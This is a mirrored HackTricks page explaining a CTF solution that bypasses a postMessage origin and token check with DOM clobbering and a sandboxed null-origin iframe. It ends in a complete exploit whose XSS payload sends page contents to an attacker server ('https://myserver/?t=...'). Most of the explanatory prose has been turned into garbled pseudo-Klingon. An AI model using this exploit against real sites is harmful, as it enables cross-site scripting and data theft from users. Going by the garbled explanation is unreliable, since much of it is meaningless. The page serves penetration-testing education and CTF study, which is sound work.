Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/postmessage-vulnerabilities/bypassing-sop-with-iframes-2.md
Translator workflow b442ae90c4 Translated to Klingon
2024-02-10 17:52:19 +00:00

6.4 KiB
Raw Permalink Blame History

Bypassing SOP with Iframes - 2

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Iframes in SOP-2

In the solution for this challenge, @Strellic_ proposes a similar method to the previous section. Let's check it.

In this challenge the attacker needs to bypass this:

if (e.source == window.calc.contentWindow && e.data.token == window.token) {

ghItlh vaj postmessage HTML content bI'vItlhutlh innerHTML ghItlh sanitation (XSS) bI'vItlhutlh.

'ej bypass check wa' window.calc.contentWindow 'e' undefined 'ej e.source 'e' null bI'vItlhutlh:

  • window.calc.contentWindow 'oH document.getElementById("calc") 'e'. document.getElementById 'oH <img name=getElementById /> bI'vItlhutlh (Sanitizer API -here- 'oH DOM clobbering attacks bI'vItlhutlh Sanitizer API default state ghItlh).
  • 'ach, document.getElementById("calc") 'oH <img name=getElementById /><div id=calc></div> bI'vItlhutlh. 'ej, window.calc 'e' undefined bI'vItlhutlh.
  • vaj, e.source 'e' undefined 'ej null bI'vItlhutlh (== === vItlhutlh, null == undefined 'oH True). vaj 'e' "easy". 'ej iframe 'ej postMessage bI'vItlhutlh 'e' 'ej iframe 'e' 'e' 'ej e.origin 'e' null. vItlhutlh code bI'vItlhutlh:
{<iframe id="myIframe" src="https://example.com"></iframe>}
<script>
  const iframe = document.getElementById("myIframe");
  iframe.contentWindow.postMessage("Hello", "*");
  iframe.remove();
</script>

let iframe = document.createElement('iframe');
document.body.appendChild(iframe);
window.target = window.open("http://localhost:8080/");
await new Promise(r => setTimeout(r, 2000)); // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`);
document.body.removeChild(iframe); //e.origin === null

Quch token null value yIqaw window.token undefined value bypass second check ghItlh:

  • token value null postMessage bIjatlh yIqaw.
  • window.token getCookie function ghItlh document.cookie vIlegh. null origin pages document.cookie ghItlh error tIq. window.token undefined value yIqaw.

@terjanq ghItlh final solution yIqaw.

<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open('https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"');

function start(){
var ifr = document.createElement('iframe');
// Create a sandboxed iframe, as sandboxed iframes will have origin null
// this null origin will document.cookie trigger an error and window.token will be undefined
ifr.sandbox = 'allow-scripts allow-popups';
ifr.srcdoc = `<script>(${hack})()<\/script>`

document.body.appendChild(ifr);

function hack(){
var win = open('https://obligatory-calc.ctf.sekai.team');
setTimeout(()=>{
parent.postMessage('remove', '*');
// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
// token=null equals to undefined and e.source will be null so null == undefined
win.postMessage({token:null, result:"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>"}, '*');
},1000);
}

// this removes the iframe so e.source becomes null in postMessage event.
onmessage = e=> {if(e.data == 'remove') document.body.innerHTML = ''; }
}
setTimeout(start, 1000);
</script>
</body>
</html>
qaStaHvIS AWS hacking vItlhutlh htARTE (HackTricks AWS Red Team Expert)!